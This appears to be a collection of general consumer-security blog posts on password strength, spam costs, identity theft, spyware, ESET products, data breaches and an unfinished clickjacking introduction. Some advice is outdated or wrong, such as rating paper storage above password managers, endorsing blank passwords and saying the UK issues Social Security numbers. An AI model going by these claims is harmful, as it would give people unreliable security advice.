If criminals or other malicious users steal this information, they can use your name to open new credit card accounts, apply for a mortgage, or pose as you in online transactions. In many cases you would not notice these attacks until it was too late.

Fortunately, it is not hard to create strong passwords and keep them well protected.

What makes a strong password

To an attacker, a strong password should appear to be a random string of characters. The following criteria can help your passwords do so:

Make it lengthy. Each character that you add to your password increases the protection that it provides many times over. Your passwords should be 8 or more characters in length; 14 characters or longer is ideal.

Many systems also support use of the space bar in passwords, so you can create a phrase made of many words (a “pass phrase“). A pass phrase is often easier to remember than a simple password, as well as longer and harder to guess.

Combine letters, numbers, and symbols. The greater variety of characters that you have in your password, the harder it is to guess. Other important specifics include:

The fewer types of characters in your password, the longer it must be. A 15-character password composed only of random letters and numbers is about 33,000 times stronger than an 8-character password composed of characters from the entire keyboard. If you cannot create a password that contains symbols, you need to make it considerably longer to get the same degree of protection. An ideal password combines both length and different types of symbols.

Use the entire keyboard, not just the most common characters. Symbols typed by holding down the “Shift” key and typing a number are very common in passwords. Your password will be much stronger if you choose from all the symbols on the keyboard, including punctuation marks not on the upper row of the keyboard, and any symbols unique to your language.

Use words and phrases that are easy for you to remember, but difficult for others to guess. The easiest way to remember your passwords and pass phrases is to write them down. Contrary to popular belief, there is nothing wrong with writing passwords down, but they need to be adequately protected in order to remain secure and effective.

In general, passwords written on a piece of paper are more difficult to compromise across the Internet than a password manager, Web site, or other software-based storage tool, such as password managers.

Create a strong, memorable password in 6 steps

Use these steps to develop a strong password:

1. Think of a sentence that you can remember. This will be the basis of your strong password or pass phrase. Use a memorable sentence, such as “My son Aiden is three years old.”

2. Check if the computer or online system supports the pass phrase directly. If you can use a pass phrase (with spaces between characters) on your computer or online system, do so.

3. If the computer or online system does not support pass phrases, convert it to a password. Take the first letter of each word of the sentence that you’ve created to create a new, nonsensical word. Using the example above, you’d get: “msaityo”.

4. Add complexity by mixing uppercase and lowercase letters and numbers. It is valuable to use some letter swapping or misspellings as well. For instance, in the pass phrase above, consider misspelling Aiden’s name, or substituting the word “three” for the number 3. There are many possible substitutions, and the longer the sentence, the more complex your password can be. Your pass phrase might become “My SoN Ayd3N is 3 yeeRs old.” If the computer or online system will not support a pass phrase, use the same technique on the shorter password. This might yield a password like “MsAy3yo”.

5. Finally, substitute some special characters. You can use symbols that look like letters, combine words (remove spaces) and other ways to make the password more complex. Using these tricks, we create a pass phrase of “MySoN 8N i$ 3 yeeR$ old” or a password (using the first letter of each word) “M$8ni3y0″.

6. Test your new password with a Password Checker. A Password Checker is a non-recording feature on this Web site that helps determine your password’s strength as you type.

Password strategies to avoid

Some common methods used to create passwords are easy to guess by criminals. To avoid weak, easy-to-guess passwords:

Avoid sequences or repeated characters. “12345678,” “222222,” “abcdefg,” or adjacent letters on your keyboard do not help make secure passwords.

Avoid using only look-alike substitutions of numbers or symbols. Criminals and other malicious users who know enough to try and crack your password will not be fooled by common look-alike replacements, such as to replace an ‘i’ with a ’1′ or an ‘a’ with ‘@’ as in “M1cr0$0ft” or “P@ssw0rd”. But these substitutions can be effective when combined with other measures, such as length, misspellings, or variations in case, to improve the strength of your password.

Avoid your login name. Any part of your name, birthday, social security number, or similar information for your loved ones constitutes a bad password choice. This is one of the first things criminals will try.

Avoid dictionary words in any language – Criminals use sophisticated tools that can rapidly guess passwords that are based on words in multiple dictionaries, including words spelled backwards, common misspellings, and substitutions. This includes all sorts of profanity and any word you would not say in front of your children.

Use more than one password everywhere – If any one of the computers or online systems using this password is compromised, all of your other information protected by that password should be considered compromised as well. It is critical to use different passwords for different systems.

Avoid using online storage – If malicious users find these passwords stored online or on a networked computer, they have access to all your information.

The “blank password” option

A blank password (no password at all) on your account is more secure than a weak password such as “1234″. Criminals can easily guess a simplistic password, but on computers using Windows XP/Vista or Windows 7, an account without a password cannot be accessed remotely by means such as a network or the Internet. (This option is not available for Microsoft Windows 2000, Windows Me, or earlier versions) You can choose to use a blank password on your computer account if these criteria are met:

• You only have one computer or you have several computers but you do not need to access information on one computer from another one

• The computer is physically secure (you trust everyone who has physical access to the computer)

The use of a blank password is not always a good idea. For example, a laptop computer that you take with you is probably not physically secure, so on those you should have a strong password.

How to access and change your passwords

Online accounts

Web sites have a variety of policies that govern how you can access your account and change your password. Look for a link (such as “my account”) somewhere on the site’s home page that goes to a special area of the site that allows password and account management.

Computer passwords

The Help files for your computer operating system will usually provide information about how to create, modify, and access password-protected user accounts, as well as how to require password protection upon startup of your computer. You can also try to find this information online at the software manufacturer’s Web site. For example, if you use Microsoft Windows XP, online help can show you how to manage passwords, change passwords, and more.

Keep your passwords secret

Treat your passwords and pass phrases with as much care as the information that they protect.

Don’t reveal them to others – Keep your passwords hidden from friends or family members (especially children) who could pass them on to other less trustworthy individuals. Passwords that you need to share with others, such as the password to your online banking account that you might share with your spouse, are the only exceptions.

Protect any recorded passwords – Be careful where you store the passwords that you record or write down. Do not leave these records of your passwords anywhere that you would not leave the information that they protect.

Never provide your password over e-mail or based on an e-mail request. Any e-mail that requests your password or requests that you to go to a Web site to verify your password is almost certainly a fraud. This includes requests from a trusted company or individual. E-mail can be intercepted in transit, and e-mail that requests information might not be from the sender it claims. Internet “phishing” scams use fraudulent e-mail messages to entice you into revealing your user names and passwords, steal your identity, and more.

Change your passwords regularly – This can help keep criminals and other malicious users unaware. The strength of your password will help keep it good for a longer time. A password that is shorter than 8 characters should be considered only good for a week or so, while a password that is 14 characters or longer (and follows the other rules outlined above) can be good for several years.

Do not type passwords on computers that you do not control. Computers such as those in Internet cafés, computer labs, shared systems, kiosk systems, conferences, and airport lounges should be considered unsafe for any personal use other than anonymous Internet browsing. Do not use these computers to check online e-mail, chat rooms, bank balances, business mail, or any other account that requires a user name and password. Criminals can purchase keystroke logging devices for very little money and they take only a few moments to install. These devices let malicious users harvest all the information typed on a computer from across the Internet—your passwords and pass phrases are worth as much as the information that they protect. Windows has an OnScreen Keyboard that you can access if needs be. Press Start > Run and type OSK and click OK. Now use the mouse to type in a password.

Windows 7 On Screen Keyboard

What to do if your password is stolen

Be sure to monitor all the information you protect with your passwords, such as your monthly financial statements, credit reports, online shopping accounts, and so on. Strong, memorable passwords can help protect you against fraud and identity theft, but there are no guarantees. No matter how strong your password is, if someone breaks into the system that stores it, they will have your password. If you notice any suspicious activity that could indicate that someone has accessed your information, notify authorities as quickly as you can. If you need further help on what to do if you think your identity has been stolen or you’ve been similarly defrauded, then contact me.

Spam may be cheap for the people who send it, but it can be a serious expense for your business. According to a study conducted earlier this year by Nucleus Research Inc., spam management costs Businesses more than £/$ 150 billion annually in lost productivity — £/$ 1400 per employee.

Here’s a quick look at the various ways that spam drains your company’s bank account and how you can calculate the real cost to your business.

Anti-Spam Technology: Spam-fighting products and services are a big business, and anti-spam vendors aren’t generating their revenue from the people sending junk email. Most companies not only spend thousands of dollars on anti-spam software and hardware solutions, but they also drop cash on employees and consultants to plan, deploy and maintain the technologies.

Lost Productivity: Spam wastes employees’ time. The average employee spends 16 seconds reviewing and deleting each spam message, according to Nucleus Research. The company estimates that at businesses that quarantine spam (where junk messages are placed in a directory for review and confirmation by recipients), each user spends an average of 4.5 minutes per week reviewing messages. Deleting messages, however, turns out to be the most expensive spam strategy. The average employee at companies that delete spam messages loses an average of 7.3 minutes per week looking for lost legitimate messages.

Wasted Storage: Companies that quarantine spam must add extra storage capacity to accommodate suspicious mail so that users can review it at their leisure. But many users never bother to review their quarantined messages, so the email just sits there, consuming storage space and money.

Internet Service Cost Pass-Alongs: This number is difficult to calculate. Still, it would be naive to believe that ISPs aren’t passing along junk email’s tremendous costs to their customers. In an October 2007 report, anti-spam software vendor Symantec Corp. estimated that 70 percent of all email was spam. The traffic burden created by junk email forces ISPs to add extra network and server capacity, as well as to install their own anti-spam solutions.

An Intangible Cost: Spam has a broader economic impact as well, hitting many businesses and nations that are least able to bear the burden. Consider Nigeria, for example. Nucleus Research noted that while fraud and corruption have been rampant in Nigeria for some time, the country may be forever kept in the digital darkness because of the volume of deceptive email sent by local spammers. The research firm noted that most spam filters block any mail with “Nigeria” in the title or text, effectively keeping anyone communicating with, from, to or about Nigeria from doing it via email.

Nigerian scams are also known as 419 Fraud, so named from the code given to Email fraud in Nigeria.

Your Cost: If you’re interested in seeing just how much spam is costing your business, use Computer Mail Services Inc.’s spam-cost calculator. For a second opinion, check out the Sendio spam-cost calculator.

Other spam-cost calculators are available at NetworkWorld.com, Network Computing and Commtouch.

Identity theft has been a big hit with the purveyors of fear in recent years. We all now live in terror of waking up one morning and finding that someone has stolen our identity, and we can’t even remember who we are.

Well, maybe not. But identity theft is a real problem. If someone manages to construct a copy of your identity, you don’t stop being you, you just stop being the owner of all of your money (unless you can persuade your bank it’s their fault). You might get back from vacation to find that your house has been stolen…

Identity is closely tied to the concept of reputation. We are now trying to apply ideas from villages of a few hundred people to a global scale and (not surprisingly) finding that they don’t quite work.

In a small community, everyone knows—or knows of—everyone else. Reputations are very important. If you want to borrow something from a neighbour, or ask them for a favour, then you will have some idea of how much you trust them.

When banks started, they would use this sort of model. They would be willing to lend you money based on letters of recommendation from people they trusted, or based on their prior dealings.

Now banks have grown so big that they use a much less personal system, but still deal in the idea of reputations.

The Social Security Scam

Some time ago, the UK and the U.S. governments introduced the concept of a Social Security number (SSN). This was a unique identifier assigned to every taxpaying citizen, allowing their tax records to be connected together.

Having a unique identifier for people was useful to a lot of institutions. It’s pretty hard to know whether you can trust John Smith, but it’s much easier to find out information about a specific John Smith.

The problem began when people started regarding knowing someone’s Social Security number as proof (or, at least, strong evidence) that you were that person.

This attitude isn’t limited to SSNs, by the way. One of my banks has an ultra-secure login where, in addition to my password, they also require that I tell them the following information:

• My mother’s maiden name
• My house number
• My date of birth

All these responses are public knowledge and can be looked up by anyone who wanted to find them out.

The most surreal experience I’ve had with a bank was one based in the United States. I phoned them to try to set up Internet banking. The conversation went something like this:

Me: Hi, I’d like to know my password for Internet banking, please.

Them: Certainly. We just need to confirm your identity. Can you tell me the size of the last transaction in your account, please?

Me: No, I want to log into Internet banking to look that up.

Them: Oh, we can tell you that over the phone.

Me: Okay…

Them: £n

Me: Thanks. The answer to your question is £n.

Them: Oh, I can’t ask you things I’ve just told you as a security question.

Me: Well, that’s sensible.

Them: Let me transfer you to someone who can.

Me: !

The next person I talked to asked me for the number that the first representative had given me, and was then happy to pass on my Internet banking password.

The illusion of security seems very popular with banks at the moment.

Reputation versus Identity

Part of the problem with this system is that it associates your reputation with your identity. If you are going to buy a house and are looking for a mortgage, then it is not unreasonable for a potential lender to want to know about the house you are thinking of buying, your current income, earning potential, outstanding debts, and so on.

If, on the other hand, you are looking to take out a credit card with a £1,000 credit limit, the only thing they need to know is whether you can service a debt of £1,000.

Either do you have £1,000 in liquid assets, or do you have enough disposable income to service interest payments at the horrendous rates that credit card companies charge?

Unfortunately, the way the system is set up at the moment, there is no fine-grained control. Someone who uses a £1,000 credit card application to steal your identity gets enough to take out a £500,000 mortgage backed by your reputation.

A bigger problem is what to do after your identity has been stolen. Fingerprint locks are pretty cheap now, but most people still prefer to use pass codes. The reason is, if someone steals a pass code, you can change it.

If someone steals a copy of your fingerprint, it’s very difficult to grow a new finger. The current situation with identities is similar to the fingerprint lock. So much of the information associated with your virtual identity is tied to the real you that building a new one that the thief does not have access to is very hard.

Multiple Personalities

One solution to this problem would be to have multiple virtual identities. This is already quite common outside of financial circles.

I have an account on Slashdot, for example, where I post under a pseudonym. Someone who cared enough could probably link that virtual identity to me fairly easily, but most of the time it can be treated as a separate persona. It has an independent reputation, based on Slashdot’s karma system.

Since I post more informative comments than troll posts (or, at least, most of my attempts at trolling go unnoticed), that persona has a good reputation. That reputation, however, is in no way related to the reputation I have as a result of writings published in other places.

The idea of multiple personalities would make sense for financial markets, too. Going back to the earlier example, if I wanted to apply for a credit card, then I would not have to use my real identity to do so. I could create a new identity and have my real identity guarantee it up to a certain limit that would be sensible for the credit application.

From the credit card company’s perspective, the identity would have a fixed income of some proportion of my income and a fixed capital of some proportion of my capital. They would be isolated from my real identity and only see the subset of my assets that were required to construct an identity that was a safe risk for lending money to.

This kind of game isn’t particularly new. Corporations do it all the time. They set up shell companies, spin-offs, or joint ventures for a variety of purposes. Some have to do with combining resources from different companies; some have to do with shielding the parent organization from liability.

Both of these would be useful for individuals. Couples sharing a house, for example, might want to create a phantom shared identity rather than having individual responsibility for various payments. Limiting liability is the more important one, however.

The concept of limited liability has to do with limiting the amount of money you can lose. In simple terms, if a limited liability company goes bust, the investors don’t lose any money beyond that which they had invested already. Banks know this, and will not take the investors’ assets into account when assessing the risk involved with lending the limited company money.

Putting this in terms of identity theft, someone who could pose as the limited company would be able to do only a small amount of damage to the investors.

This kind of structure would be ideal for limiting the effects of identity theft. When applying for small loans, you could create a limited liability identity, and an identity thief who took it would not gain any more than a thief who took a credit card.

Fluidity of Identity

The Internet has shown time and time again that reputations are important, but don’t have to be tied to specific real individuals. The entire banking system is built on top of the idea of reputation, but tries hard to tie them to real identities.

The problem of identity theft is likely to break this connection. We will see a greater disconnect between individuals and their reputations.

Corporations already do this with different branding for different market segments, and it’s only a matter of time before the facilities become more widely available.

The designers of the Secure Internet Live Chat (SILC) protocol realized this some years ago. SILC does not provide a mechanism for tying an online personality to a real person (although you can do this out of band).

Instead, it provides something more valuable; a way of telling whether a particular online identity corresponds to the same person today as it did yesterday. This is valuable in an online chat setting, because the only contact you are likely to have with a particular person in an Internet chat room is via that chat room. The reputation is based entirely on their behaviour in that context.

The same is true in many other contexts; the behaviour of individuals in a specific context is important and their actions in others are misleading. My advise; Protect yourself at all costs and be careful who you pass over your information to. Remember that Governments and legal bodies keep losing your data, either because they are careless, don’t have proper facilities in place to safeguard your data, or they just don’t care.

What do you think is the Future of Identity?

The IT security world has now enriched its vocabulary with such notions as spyware, adware, phishing, zombie PCs, spam robots, etc. Thus software protection from all that malware has appeared. Some developers offer specialized utilities, others supply whole packages of applications for deleting various malicious modules. These programs could be efficient, and thoroughly “clean” the system, if they could prevent zero-day threats from entering the PC.

Recently the amount of Internet threats to users’ PCs has risen disastrously. Last October, as a result of research lead under America Online and National Cyber Security Alliance initiatives, traces of spyware activity were found in more than 80% of users’ computers. The subject is relevant, so it’s time to talk about spyware, why users’ PCs are vulnerable and how to protect your computer from spyware attacks.

What is spyware?

Spyware is a general term used for software that traces user activity on the PC and collects personal info or confidential data without user consent. Spyware can register the websites you visit, the time of visits, all clicks on the keyboard (this is how credit card numbers and pin-codes are often stolen) or monitor and register secretly for software that is in turn installed on a PC.

The most dangerous spyware one which self replicates via e-mail, and installs itself without your consent using software bugs. Software intercepting e-mails and instant messages can collect and transmit confidential information to Internet, and are also dangerous and valid security concerns. Some software may also change parameters of installed security software without your consent. All this makes your computer vulnerable to spyware attacks. Depending on the type of spyware, some programs may warn the developer about users running applications on their PCs, while others are able to make holes for intrusion into the system, or set the modem to make calls, which the PC owner will eventually be billed for. Recently, some shareware programs have been referred to as spyware, such programs extract files from your computer without your consent. One of the most dangerous features of spyware is the ability to transmit collected information to the developer’s PC.

Spyware can enter your PC in a number of different ways. The most common is via e-mail or a Web browser. Also such software may be integrated into “useful” software and downloaded at the moment of “useful” program start-up. Generally such programs are integrated into popular free software, which are downloaded from the Internet, or distributed on CDs attached to magazines.

Why spyware is dangerous?

Spyware doesn’t have much influence on the way your PC runs. Usually, it doesn’t contain viruses, however it can consume a huge amount of system resources. Spyware brings lots of damage in the sense of data confidentiality. Spyware programs register every user step, both inside the system and in the Internet. All information is delivered to the malefactor who collects data in his, not your, interest!

How do I protect my PC from spyware?

Most spyware programs are integrated into freeware that you have to install on your computer, but some are automatically downloaded when you enter a Web site. If a message pops-up on your screen proposing you install a program providing access to Web site content, don’t hurry to press “OK” without checking the software. If there is no need to install some special software to view the Web site, it’s better to refuse downloading extra software.

On some Web sites you can find lists of programs containing harmful spy modules. Looking through these lists can help you learn if such programs have been installed on your computer. Sometimes PC system behavior such as slow typing, periodical alarms of installed firewalls, registration queries to unknown Web sites, system and network efficiency reduction and suspicious file discovery may indicate that spyware is inside. The best way to protect your computer from spyware is to install specialized anti-spy software.

Security Tools

A firewall is considered to be the most popular tool to protect a computer from spyware. Firewalls are integrated into operating systems (OS) and permanently examine incoming and outgoing addresses to computer network ports. They analyse data packages coming to Internet ports and mail ports according to the type of request and the addressee. Most firewalls allow or deny some types of addresses, but this is a weak point because spyware may be integrated inside many packages or disguised as a Web browser. This type of spyware cannot be detected by a firewall, and gets inside the PC to start its malicious activity. Also, firewalls are usually resource-consuming, so the price for relative security is
your PC running much slower.

The problem of firewall relative protection is successfully solved by proactive security systems. Such systems analyze all application activity on the PC for its potential maliciousness, according to predefined rules of malicious or non-dangerous behaviour. In case of a real threat, proactive systems block dangerous programs before any damage to the OS is done.

An anti-spyware solutions called Safe’n’Sec+Anti-Spyware, is a special solution consisting of Safe’n’Sec behavior analyzer — which blocks previously unknown spyware (new modifications) — and the Anti-Spyware module, which detects already known spyware with the help of extended anti-spyware signature databases. This Anti-Spyware module has the option to delete malware from the user’s PC. The solution is absolutely compatible with any traditional security software installed on your computer. Anti-Spyware solutions efficiently protect your confidential data from unauthorized access, whether you work in the system or just browse the Internet.

ESET’s award-winning anti-malware solutions ESET NOD32 Antivirus and ESET Smart Security, for consumers and businesses. The new versions build on ESET’s ThreatSense, the industry’s most accurate proactive technology for detecting viruses and other malware, by adding over 20 new capabilities that improve malware detection, enhance system diagnostics and recovery, and improve management. The latest release continues ESET’s tradition of delivering ultimate security with fast, transparent operation and minimal load on system memory, disk or CPU. ESET’s unrivaled ability to deliver industry-leading proactive malware detection and high system performance can literally extend the life of PCs and laptops while improving their security.

‘In an increasingly complex threat environment, anti-malware solution providers are tasked with packing even more security features into endpoint security products, but must be conscious of system performance when doing so,’ said Andrew Hanson, research analyst, Security Products, IDC. ‘Current economic pressures are causing businesses to extend or freeze PC-replacement cycles, but security expenditures are still required to address the growing threat landscape. Leading security vendors will provide cost effective solutions that successfully integrate multiple layers of protection, while extending the life of the computer by conserving system resources and maintaining performance ‘ all at a price point businesses and consumers can afford.’

ESET’s new detection and diagnostic features (one shown above) safeguard users from deceptive forms of malware by digging deeper into the operating system, files and encrypted browser traffic to identify and eliminate hidden malware threats. The latest version also includes advanced self-defense technology that protects against malware designed to disable antivirus or anti-malware solutions, leaving the user completely unprotected. Together, these new features enable consumers and businesses to proactively block most new malware attacks before they can compromise systems to damage or steal data.

ESET NOD32 Antivirus 4 and ESET Smart Security 4 Business Editions also feature a full-range of management capabilities. These include support for high-end databases, fine-grained control of endpoint security, and even greater scalability for large, dispersed networks. ESET Business Editions include version 3.0 of ESET’s Remote Administrator, which enables businesses to remotely deploy and manage ESET software. New Statistics will help admins and users see trends in infection on the machine.

ESET NOD32 Antivirus 4 and ESET Smart Security 4′s new, industry-first security features include:

• Advanced Archive Scanning ‘ This new feature makes ESET’s consumer products the first to allow experienced users to fully customize scanning to do a ‘deep dive’ of archive files created with popular compression formats, including .RAR, .ZIP and others. Comprehensive controls allow users to define archive scanning with scanning depth, maximum scan time and maximum file size.
• Removable Media Access Control ‘ Gives consumers removable media security for USB flash drives and CDs ‘ protection previously extended only to businesses. The feature gives administrators the ability to allow or block mounting of removable media. If removable media is allowed, dangerous files like AUTORUN.INF are scanned for threats.
• ESET SysInspector ‘ Newly integrated into ESET NOD32 Antivirus 4 and ESET Smart Security 4, this powerful system diagnostics tool quickly discovers hidden/potentially dangerous rootkits without running a full antivirus scan. It can also reveal hidden changes to the operating system, web browser, registry and applications. The scan results are standardized and can be reviewed by IT personnel, speeding up malware analysis and removal.
• ESET SysRescue ‘ Enables users to diagnose and recover compromised systems more easily. Customers build their own system rescue CDs, which can be used to clean up and repair systems compromised by malware without re-imaging the system.

With ESET NOD32 Antivirus 4 and ESET Smart Security 4, the company also adds the following additional features to further improve threat prevention, detection and management:

• Business-class Interoperability and Management ‘ ESET includes powerful features to integrate into multi-layer security environments. Enhanced reporting, support for Cisco NAC, removable media control and improved policy authoring simplify deployment and ongoing management, with improved interoperability.
• Power Conservation ‘ Already the most efficient and lightweight anti-malware products on the market, ESET NOD32 Antivirus 4 and ESET Smart Security 4 go one step further by automatically adjusting performance on laptops to maximize battery life without compromising security.
• Improved Self-defense Technology ‘ ESET software features improved defenses against disabling of the antivirus system by malware or unauthorized users ‘ among other things by restricting changes to ESET’s processes and registry entries to authenticated users.

• User-friendly Interface ‘ Numerous enhancements to the GUI make the product even easier to use. Among many enhancements, there is auto-disabling notifications when full-screen applications like presentations, games or video are running, and a new non-graphical user interface that allows disabled and visually-impaired users to easily interact with the software using screen readers and other assistive technologies.

For a full list of ESET NOD32 Antivirus 4 and ESET Smart Security 4 features, please visit http://www.eset.com/products/.

ID Data Theft

ID-related data theft occurs when customer records are stolen or illegally copied. The information stolen typically includes customers’ names, addresses, phone numbers, usernames, passwords and PINs, account and credit card numbers, and, in some instances, Social Security numbers. When transmitted or sold to lower-level criminals, this information can be used to commit all manner of identity fraud.

A single data theft can affect large numbers of individual victims. There are many examples to cite.

Let’s start here in England. In January, 2008, two laptop PCs were stolen from Brent’s Central Middlesex Hospital. Each laptop contained hundreds of confidential patient records. Not a large theft (389 records in all), but one particularly disconcerting to the patients whose personal data were compromised.

Then there was the case of the Wilkes-Barre driver’s license centre in Hanover, PA, which was broken into in late November, 2006. In addition to assorted office supplies and materials, the thief got away with a computer containing driver’s license information for more than 11,000 citizens.

Not even those companies charged with keeping our data safe are immune from data theft. For example, ChoicePoint, Inc., is a company that collects personal and financial information on millions of computers. In February, 2005, ChoicePoint reported that it had suffered a security breach and inadvertently sold personal information on 145,000 people to a criminal enterprise. Oops!

A much larger theft occurred in October, 2007, when the financial institution GE Money discovered that a computer tape containing information on 650,000 J.C. Penney customers had gone missing. Although not yet officially confirmed as a theft (it was just “missing”), the tape in question included more than 150,000 Social Security numbers.

Retailers store a lot of valuable data about their customers, which makes them a prime target of data thieves. Thus the story of shoe retailer DSW, which in June, 2005, had 1.4 million customer records stolen. Among those customers affected was then-FTC chairwoman Deborah Platt Majoras—a nice little irony for those that care.

Of course, data theft isn’t limited to the retail sector. Witness the U.S. Department of Veterans Affairs, which had the home of one of its employees burglarized in May of 2006. Stolen in the burglary was a laptop computer and external disk drive that contained the Social Security numbers of about 26.5 million veterans. That was a big breach—but the story has a happy ending. Thanks to some excellent police work, the hard drive was eventually recovered; it was later determined that the sensitive data had not been accessed.

An even bigger breach was the June, 2005, “security incident” reported by Atlanta-based payment processor CardSystems Solutions. The company handles payments for all the major credit cards, including MasterCard, Visa, American Express, and Discover. Intruders used malicious software code to breach the company’s systems, exposing more than 40 million credit card accounts to potential fraud. Fortunately, only about 200,000 of these accounts were found to be actually stolen, but the FBI was still called in to investigate.

But all these incidents pale compared to the largest reported case of data theft on record. In December, 2006, the TJX Companies (parent to T.J. Maxx, Marshalls, and other retailers) reported a massive computer breach on that part of its network that handles credit card, debit card, check, and merchandise transactions. It appears that hackers made off with more than 94 million records from customers in the U.S. and abroad.

Take a look at that last case again. A single data theft compromised the identities of an estimated 94 million individuals. That’s just an incredible number—and indicative of the impact of this type of computer crime.

NOTE: For what it’s worth, TJX disputes the 94 million number, which comes from a group of banks suing the company over the breach. The company says that only 45.7 million records were stolen—which is still a very big deal.

Non-ID Data Theft

Customers’ records aren’t the only kind of data that can be stolen from a large organization. Companies of all sorts are hosts to various types of confidential information; this information, if accessed by a competitor, could often lead to a diminishment of the company’s position in the marketplace.

Non-ID data theft occurs when an employee makes one or more copies of a company’s confidential information, and then uses that information either for his own personal use or transmits that information to a competitor for the competitor’s use. However it’s done, this is a theft of the business’ intellectual property, every bit as harmful as a theft of money or equipment.

What kind of information are we talking about? A company’s confidential information includes its employee records, contracts with other firms, financial reports, marketing plans, new product specifications, and so on. Imagine you’re a competitor who gets hold of a company’s plans for an upcoming product launch; with knowledge beforehand, you can create your own counter-launch to blunt the impact of the other company’s new product. A little inside information can be extremely valuable—and damaging for the company from which it was stolen.

NOTE: One notable example of non-ID theft occurred in 2006, when three Coca-Cola employees attempted to steal the secret formula for Coke. They tried to sell the trade secret to rival PepsiCo; unfortunately for them, Pepsi contacted Coca-Cola management, who alerted the FBI. The Feds used this information to conduct a sting operation that landed all three culprits in the big house.

The clickjacking technique is an old form of an attack that was reincarnated recently with help from Jeremiah Grossman and Robert (rsnake) Hansen, two researchers known for several discoveries of web and client-side (more specifically, browser-related) vulnerabilities. Ever since Grossman and Hansen’s public statement about their finding, the clickjacking technique has been discussed in full on several niche blogs and information security resources online, including ha.ckers.org, hackademix.net and GNUCITIZEN.

In this article, we’ll look into what clickjacking is and what you need to do to protect yourself as a web application developer and as a user.

What Is Clickjacking?

The clickjacking technique falls into the category of graphical user interface (GUI) attacks. Another attack in the same category is the infamous file-input focus-stealing bug, with all of its variations, which allows attackers to steal any file from the filesystem when the victim is tricked into typing characters into a seemingly harmless text field. The clickjacking attack is also what security researchers call a design bug. Essentially, clickjacking is possible because of several design limitations. Design bugs are difficult to fix because they usually require change of the affected system’s design, which is something that may not be very trivial to do. Very often, design bugs stay unfixed.

To understand how clickjacking works, consider the following example. You visit your Facebook account. On your dashboard is a notification that one of your friends wants to share a new story with you, so you follow the link inside her message. Once you click the link, a new tab opens inside your browser, displaying a strange but rather harmless-looking message. The page simply asks whether you’d like to use AJAX in order to preview the content of the page, as it will improve your user experience. There’s only one button, so you hurry to click it and move on.

Game over—you’ve been clickjacked! The longer you stay on this page, the more auditory and visual data will be retrieved from your current surroundings, via your microphone and camera. You’ve been cyber-bugged.